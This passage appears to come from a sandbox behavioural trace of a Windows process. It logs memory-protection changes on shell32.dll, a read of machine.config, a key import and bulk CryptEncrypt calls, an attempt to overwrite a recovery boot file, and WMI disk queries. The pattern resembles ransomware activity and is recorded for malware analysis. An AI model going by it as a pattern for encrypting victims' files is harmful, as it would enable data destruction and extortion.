(hEvent=0xb8) returned 1 [0139.480] GetCurrentThreadId () returned 0x284 [0139.480] GetCurrentThreadId () returned 0x284 [0139.480] SetEvent (hEvent=0xbc) returned 1 [0139.481] SetEvent (hEvent=0xb8) returned 1 [0139.481] CloseHandle (hObject=0x4a4) returned 1 [0139.481] SysReAllocStringLen (in: pbstr=0x704e388*=0x0, psz="shell32.dll", len=0xb | out: pbstr=0x704e388*="shell32.dll") returned 1 [0139.481] CharLowerBuffW (in: lpsz="shell32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0139.481] LoadLibraryExW (lpLibFileName="shell32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0139.481] GetLastError () returned 0x0 [0139.482] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0139.482] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0139.482] GetModuleFileNameA (in: hModule=0x759d0000, lpFilename=0x704e26c, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0139.483] GetCurrentProcess () returned 0xffffffff [0139.483] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e370*=0x759d13b4, NumberOfBytesToProtect=0x704e374, NewAccessProtection=0x4, OldAccessProtection=0x704e3a8 | out: BaseAddress=0x704e370*=0x759d1000, NumberOfBytesToProtect=0x704e374, OldAccessProtection=0x704e3a8*=0x20) returned 0x0 [0139.483] GetCurrentProcess () returned 0xffffffff [0139.483] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e370*=0x759d13b4, NumberOfBytesToProtect=0x704e374, NewAccessProtection=0x20, OldAccessProtection=0x704e3a8 | out: BaseAddress=0x704e370*=0x759d1000, NumberOfBytesToProtect=0x704e374, OldAccessProtection=0x704e3a8*=0x4) returned 0x0 [0139.484] GetCurrentProcess () returned 0xffffffff [0139.484] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e370*=0x759d13c4, NumberOfBytesToProtect=0x704e374, NewAccessProtection=0x4, OldAccessProtection=0x704e3a8 | out: BaseAddress=0x704e370*=0x759d1000, NumberOfBytesToProtect=0x704e374, OldAccessProtection=0x704e3a8*=0x20) returned 0x0 [0139.484] GetCurrentProcess () returned 0xffffffff [0139.484] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e370*=0x759d13c4, NumberOfBytesToProtect=0x704e374, NewAccessProtection=0x20, OldAccessProtection=0x704e3a8 | out: BaseAddress=0x704e370*=0x759d1000, NumberOfBytesToProtect=0x704e374, OldAccessProtection=0x704e3a8*=0x4) returned 0x0 [0139.485] GetCurrentProcess () returned 0xffffffff [0139.485] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e370*=0x759d21c0, NumberOfBytesToProtect=0x704e374, NewAccessProtection=0x4, OldAccessProtection=0x704e3a8 | out: BaseAddress=0x704e370*=0x759d2000, NumberOfBytesToProtect=0x704e374, OldAccessProtection=0x704e3a8*=0x20) returned 0x0 [0139.485] GetCurrentProcess () returned 0xffffffff [0139.485] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e370*=0x759d21c0, NumberOfBytesToProtect=0x704e374, NewAccessProtection=0x20, OldAccessProtection=0x704e3a8 | out: BaseAddress=0x704e370*=0x759d2000, NumberOfBytesToProtect=0x704e374, OldAccessProtection=0x704e3a8*=0x4) returned 0x0 [0139.486] GetCurrentProcess () returned 0xffffffff [0139.486] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e370*=0x759d224c, NumberOfBytesToProtect=0x704e374, NewAccessProtection=0x4, OldAccessProtection=0x704e3a8 | out: BaseAddress=0x704e370*=0x759d2000, NumberOfBytesToProtect=0x704e374, OldAccessProtection=0x704e3a8*=0x20) returned 0x0 [0139.486] GetCurrentProcess () returned 0xffffffff [0139.486] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e370*=0x759d224c, NumberOfBytesToProtect=0x704e374, NewAccessProtection=0x20, OldAccessProtection=0x704e3a8 | out: BaseAddress=0x704e370*=0x759d2000, NumberOfBytesToProtect=0x704e374, OldAccessProtection=0x704e3a8*=0x4) returned 0x0 [0139.487] SetLastError (dwErrCode=0x0) [0139.487] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0139.490] GetCurrentThreadId () returned 0x284 [0139.490] ResetEvent (hEvent=0xb8) returned 1 [0139.490] GetCurrentThreadId () returned 0x284 [0139.490] GetCurrentThreadId () returned 0x284 [0139.490] GetCurrentThreadId () returned 0x284 [0139.490] GetCurrentThreadId () returned 0x284 [0139.490] ResetEvent (hEvent=0xb8) returned 1 [0139.490] GetCurrentThreadId () returned 0x284 [0139.490] GetCurrentThreadId () returned 0x284 [0139.491] SetEvent (hEvent=0xbc) returned 1 [0139.491] SetEvent (hEvent=0xb8) returned 1 [0139.491] CloseHandle (hObject=0x4b8) returned 1 [0139.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x704ea38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0139.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x704ea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0139.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704eefc) returned 1 [0139.499] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x704ef78 | out: lpFileInformation=0x704ef78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0139.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704eef8) returned 1 [0139.501] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0139.501] GetLastError () returned 0x0 [0139.501] SysReAllocStringLen (in: pbstr=0x704eb64*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x704eb64*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0139.501] GetThreadLocale () returned 0x409 [0139.501] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0139.501] GetThreadLocale () returned 0x409 [0139.501] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0139.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x104, lpBuffer=0x704e8e8, lpFilePart=0x704e8e4 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x704e8e4*="machine.config") returned 0x43 [0139.501] SysReAllocStringLen (in: pbstr=0x704eb64*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x704eb64*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0139.501] SysReAllocStringLen (in: pbstr=0x704eb14*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x704eb14*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0139.501] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchLength=0x43 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 0x43 [0139.501] SysReAllocStringLen (in: pbstr=0x704eb64*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x704eb64*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config") returned 1 [0139.502] SetLastError (dwErrCode=0x0) [0139.516] GetCurrentThreadId () returned 0x284 [0139.516] GetCurrentThreadId () returned 0x284 [0139.516] GetCurrentThreadId () returned 0x284 [0139.516] GetCurrentThreadId () returned 0x284 [0139.516] GetCurrentThreadId () returned 0x284 [0139.516] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.516] GetCurrentThreadId () returned 0x284 [0139.516] GetCurrentThreadId () returned 0x284 [0139.516] GetCurrentThreadId () returned 0x284 [0139.516] SetEvent (hEvent=0xbc) returned 1 [0139.516] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e56050, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x704eb74, lpOverlapped=0x0 | out: lpBuffer=0x6e56050*, lpNumberOfBytesRead=0x704eb74*=0xfff, lpOverlapped=0x0) returned 1 [0139.583] GetCurrentThreadId () returned 0x284 [0139.583] GetCurrentThreadId () returned 0x284 [0139.583] GetCurrentThreadId () returned 0x284 [0139.583] GetCurrentThreadId () returned 0x284 [0139.583] GetCurrentThreadId () returned 0x284 [0139.583] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.583] GetCurrentThreadId () returned 0x284 [0139.583] GetCurrentThreadId () returned 0x284 [0139.583] GetCurrentThreadId () returned 0x284 [0139.583] SetEvent (hEvent=0xbc) returned 1 [0139.583] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e54048, nNumberOfBytesToRead=0x17f7, lpNumberOfBytesRead=0x704eb5c, lpOverlapped=0x0 | out: lpBuffer=0x6e54048*, lpNumberOfBytesRead=0x704eb5c*=0x17f7, lpOverlapped=0x0) returned 1 [0139.591] GetCurrentThreadId () returned 0x284 [0139.591] GetCurrentThreadId () returned 0x284 [0139.591] GetCurrentThreadId () returned 0x284 [0139.591] GetCurrentThreadId () returned 0x284 [0139.592] GetCurrentThreadId () returned 0x284 [0139.592] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.592] GetCurrentThreadId () returned 0x284 [0139.592] GetCurrentThreadId () returned 0x284 [0139.592] GetCurrentThreadId () returned 0x284 [0139.592] SetEvent (hEvent=0xbc) returned 1 [0139.592] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e54048, nNumberOfBytesToRead=0x1001, lpNumberOfBytesRead=0x704eb6c, lpOverlapped=0x0 | out: lpBuffer=0x6e54048*, lpNumberOfBytesRead=0x704eb6c*=0x1001, lpOverlapped=0x0) returned 1 [0139.596] GetCurrentThreadId () returned 0x284 [0139.596] GetCurrentThreadId () returned 0x284 [0139.596] GetCurrentThreadId () returned 0x284 [0139.596] GetCurrentThreadId () returned 0x284 [0139.596] GetCurrentThreadId () returned 0x284 [0139.596] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.596] GetCurrentThreadId () returned 0x284 [0139.596] GetCurrentThreadId () returned 0x284 [0139.596] GetCurrentThreadId () returned 0x284 [0139.596] SetEvent (hEvent=0xbc) returned 1 [0139.596] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e54048, nNumberOfBytesToRead=0x1002, lpNumberOfBytesRead=0x704eb6c, lpOverlapped=0x0 | out: lpBuffer=0x6e54048*, lpNumberOfBytesRead=0x704eb6c*=0x1002, lpOverlapped=0x0) returned 1 [0139.601] GetCurrentThreadId () returned 0x284 [0139.602] GetCurrentThreadId () returned 0x284 [0139.602] GetCurrentThreadId () returned 0x284 [0139.602] GetCurrentThreadId () returned 0x284 [0139.602] GetCurrentThreadId () returned 0x284 [0139.602] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.602] GetCurrentThreadId () returned 0x284 [0139.602] GetCurrentThreadId () returned 0x284 [0139.602] GetCurrentThreadId () returned 0x284 [0139.602] SetEvent (hEvent=0xbc) returned 1 [0139.602] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e5b060, nNumberOfBytesToRead=0x1f28, lpNumberOfBytesRead=0x704eb60, lpOverlapped=0x0 | out: lpBuffer=0x6e5b060*, lpNumberOfBytesRead=0x704eb60*=0x1f28, lpOverlapped=0x0) returned 1 [0139.612] GetCurrentThreadId () returned 0x284 [0139.612] GetCurrentThreadId () returned 0x284 [0139.612] GetCurrentThreadId () returned 0x284 [0139.612] GetCurrentThreadId () returned 0x284 [0139.612] GetCurrentThreadId () returned 0x284 [0139.612] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.612] GetCurrentThreadId () returned 0x284 [0139.612] GetCurrentThreadId () returned 0x284 [0139.612] GetCurrentThreadId () returned 0x284 [0139.612] SetEvent (hEvent=0xbc) returned 1 [0139.612] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e5b060, nNumberOfBytesToRead=0x10a7, lpNumberOfBytesRead=0x704eb6c, lpOverlapped=0x0 | out: lpBuffer=0x6e5b060*, lpNumberOfBytesRead=0x704eb6c*=0x10a7, lpOverlapped=0x0) returned 1 [0139.711] GetCurrentThreadId () returned 0x284 [0139.711] GetCurrentThreadId () returned 0x284 [0139.711] GetCurrentThreadId () returned 0x284 [0139.711] GetCurrentThreadId () returned 0x284 [0139.711] GetCurrentThreadId () returned 0x284 [0139.711] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.711] GetCurrentThreadId () returned 0x284 [0139.711] GetCurrentThreadId () returned 0x284 [0139.711] GetCurrentThreadId () returned 0x284 [0139.711] SetEvent (hEvent=0xbc) returned 1 [0139.711] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e5b060, nNumberOfBytesToRead=0x1019, lpNumberOfBytesRead=0x704eb6c, lpOverlapped=0x0 | out: lpBuffer=0x6e5b060*, lpNumberOfBytesRead=0x704eb6c*=0x1019, lpOverlapped=0x0) returned 1 [0139.717] GetCurrentThreadId () returned 0x284 [0139.717] GetCurrentThreadId () returned 0x284 [0139.717] GetCurrentThreadId () returned 0x284 [0139.717] GetCurrentThreadId () returned 0x284 [0139.717] GetCurrentThreadId () returned 0x284 [0139.717] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.717] GetCurrentThreadId () returned 0x284 [0139.717] GetCurrentThreadId () returned 0x284 [0139.717] GetCurrentThreadId () returned 0x284 [0139.717] SetEvent (hEvent=0xbc) returned 1 [0139.717] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e5b060, nNumberOfBytesToRead=0x109d, lpNumberOfBytesRead=0x704eb60, lpOverlapped=0x0 | out: lpBuffer=0x6e5b060*, lpNumberOfBytesRead=0x704eb60*=0x4ae, lpOverlapped=0x0) returned 1 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] SetEvent (hEvent=0xbc) returned 1 [0139.720] ReadFile (in: hFile=0x4a4, lpBuffer=0x6e54048, nNumberOfBytesToRead=0x1feb, lpNumberOfBytesRead=0x704eb60, lpOverlapped=0x0 | out: lpBuffer=0x6e54048*, lpNumberOfBytesRead=0x704eb60*=0x0, lpOverlapped=0x0) returned 1 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] ResetEvent (hEvent=0xb8) returned 1 [0139.720] GetCurrentThreadId () returned 0x284 [0139.720] GetCurrentThreadId () returned 0x284 [0139.721] GetCurrentThreadId () returned 0x284 [0139.721] GetCurrentThreadId () returned 0x284 [0139.721] ResetEvent (hEvent=0xb8) returned 1 [0139.721] GetCurrentThreadId () returned 0x284 [0139.721] GetCurrentThreadId () returned 0x284 [0139.721] SetEvent (hEvent=0xbc) returned 1 [0139.721] SetEvent (hEvent=0xb8) returned 1 [0139.721] CloseHandle (hObject=0x4a4) returned 1 [0141.549] CryptGenRandom (in: hProv=0x6eec90, dwLen=0x10, pbBuffer=0x33db6a0 | out: pbBuffer=0x33db6a0) returned 1 [0144.188] CryptImportKey (in: hProv=0x6eec90, pbData=0x38ba4f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x704f04c | out: phKey=0x704f04c*=0x77b0b0) returned 1 [0144.188] CryptContextAddRef (hProv=0x6eec90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.188] CryptContextAddRef (hProv=0x6eec90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.189] CryptDuplicateKey (in: hKey=0x77b0b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x704f03c | out: phKey=0x704f03c*=0x77b0f0) returned 1 [0144.189] CryptContextAddRef (hProv=0x6eec90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.189] CryptSetKeyParam (hKey=0x77b0f0, dwParam=0x4, pbData=0x38ba5d8*=0x1, dwFlags=0x0) returned 1 [0144.189] CryptSetKeyParam (hKey=0x77b0f0, dwParam=0x1, pbData=0x38ba5a4, dwFlags=0x0) returned 1 [0144.509] CryptEncrypt (in: hKey=0x77b0f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4750460*, pdwDataLen=0x704f0a8*=0x306010, dwBufLen=0x306010 | out: pbData=0x4750460*, pdwDataLen=0x704f0a8*=0x306010) returned 1 [0145.088] CryptEncrypt (in: hKey=0x77b0f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x346a6ac*, pdwDataLen=0x704f0b0*=0x0, dwBufLen=0x10 | out: pbData=0x346a6ac*, pdwDataLen=0x704f0b0*=0x10) returned 1 [0148.143] CryptDestroyKey (hKey=0x77b0b0) returned 1 [0148.143] CryptReleaseContext (hProv=0x6eec90, dwFlags=0x0) returned 1 [0148.143] CryptReleaseContext (hProv=0x6eec90, dwFlags=0x0) returned 1 [0148.143] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x704eb20, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0148.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f014) returned 1 [0148.143] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0148.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704de50) returned 1 [0148.146] CoTaskMemAlloc (cb=0x20c) returned 0x70b7b8 [0148.146] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x70b7b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0148.146] CoTaskMemFree (pv=0x70b7b8) [0148.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x704eb08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0148.146] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x704f050 | out: ppv=0x704f050*=0x72015c) returned 0x0 [0148.146] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x704f048 | out: pAptType=0x704f048*=1) returned 0x0 [0148.147] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x704f04c | out: ppvObject=0x704f04c*=0x0) returned 0x80004002 [0148.147] IUnknown:Release (This=0x72015c) returned 0x1 [0148.147] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x704e9b8 | out: ppv=0x704e9b8*=0x6736f68) returned 0x0 [0148.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f68, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x704ebd0 | out: ppvObject=0x704ebd0*=0x0) returned 0x80004002 [0148.148] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f68, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704ebe4 | out: ppvObject=0x704ebe4*=0x67381c0) returned 0x0 [0148.148] WbemDefPath:IUnknown:Release (This=0x6736f68) returned 0x0 [0148.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e804 | out: ppvObject=0x704e804*=0x67381c0) returned 0x0 [0148.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x704e7c0 | out: ppvObject=0x704e7c0*=0x0) returned 0x80004002 [0148.148] WbemDefPath:IUnknown:AddRef (This=0x67381c0) returned 0x3 [0148.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x704e11c | out: ppvObject=0x704e11c*=0x0) returned 0x80004002 [0148.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x704e0cc | out: ppvObject=0x704e0cc*=0x0) returned 0x80004002 [0148.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e0d8 | out: ppvObject=0x704e0d8*=0x77dc18) returned 0x0 [0148.148] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x704e0e0 | out: pCid=0x704e0e0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.148] WbemDefPath:IUnknown:Release (This=0x77dc18) returned 0x3 [0148.148] CoGetContextToken (in: pToken=0x704e138 | out: pToken=0x704e138) returned 0x0 [0148.149] CoGetContextToken (in: pToken=0x704e540 | out: pToken=0x704e540) returned 0x0 [0148.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e5d0 | out: ppvObject=0x704e5d0*=0x0) returned 0x80004002 [0148.149] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x2 [0148.149] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x1 [0148.149] CoGetContextToken (in: pToken=0x704eec8 | out: pToken=0x704eec8) returned 0x0 [0148.149] CoGetContextToken (in: pToken=0x704ee28 | out: pToken=0x704ee28) returned 0x0 [0148.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x67381c0, riid=0x704eef8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x704eef4 | out: ppvObject=0x704eef4*=0x67381c0) returned 0x0 [0148.149] WbemDefPath:IUnknown:AddRef (This=0x67381c0) returned 0x3 [0148.149] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x2 [0148.149] WbemDefPath:IWbemPath:SetText (This=0x67381c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.149] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67381c0, puCount=0x704f07c | out: puCount=0x704f07c*=0x0) returned 0x0 [0148.149] WbemDefPath:IWbemPath:GetText (in: This=0x67381c0, lFlags=2, puBuffLength=0x704f078*=0x0, pszText=0x0 | out: puBuffLength=0x704f078*=0x20, pszText=0x0) returned 0x0 [0148.291] WbemDefPath:IWbemPath:GetText (in: This=0x67381c0, lFlags=2, puBuffLength=0x704f078*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x704f078*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.291] WbemDefPath:IWbemPath:GetInfo (in: This=0x67381c0, uRequestedInfo=0x0, puResponse=0x704f084 | out: puResponse=0x704f084*=0xc19) returned 0x0 [0148.291] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67381c0, puCount=0x704f07c | out: puCount=0x704f07c*=0x0) returned 0x0 [0148.291] WbemDefPath:IWbemPath:GetInfo (in: This=0x67381c0, uRequestedInfo=0x0, puResponse=0x704f084 | out: puResponse=0x704f084*=0xc19) returned 0x0 [0148.291] WbemDefPath:IWbemPath:GetInfo (in: This=0x67381c0, uRequestedInfo=0x0, puResponse=0x704f084 | out: puResponse=0x704f084*=0xc19) returned 0x0 [0148.291] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67381c0, puCount=0x704effc | out: puCount=0x704effc*=0x0) returned 0x0 [0148.291] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x704efe8 | out: puCount=0x704efe8*=0x2) returned 0x0 [0148.291] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x704efe4*=0x0, pszText=0x0 | out: puBuffLength=0x704efe4*=0xf, pszText=0x0) returned 0x0 [0148.291] 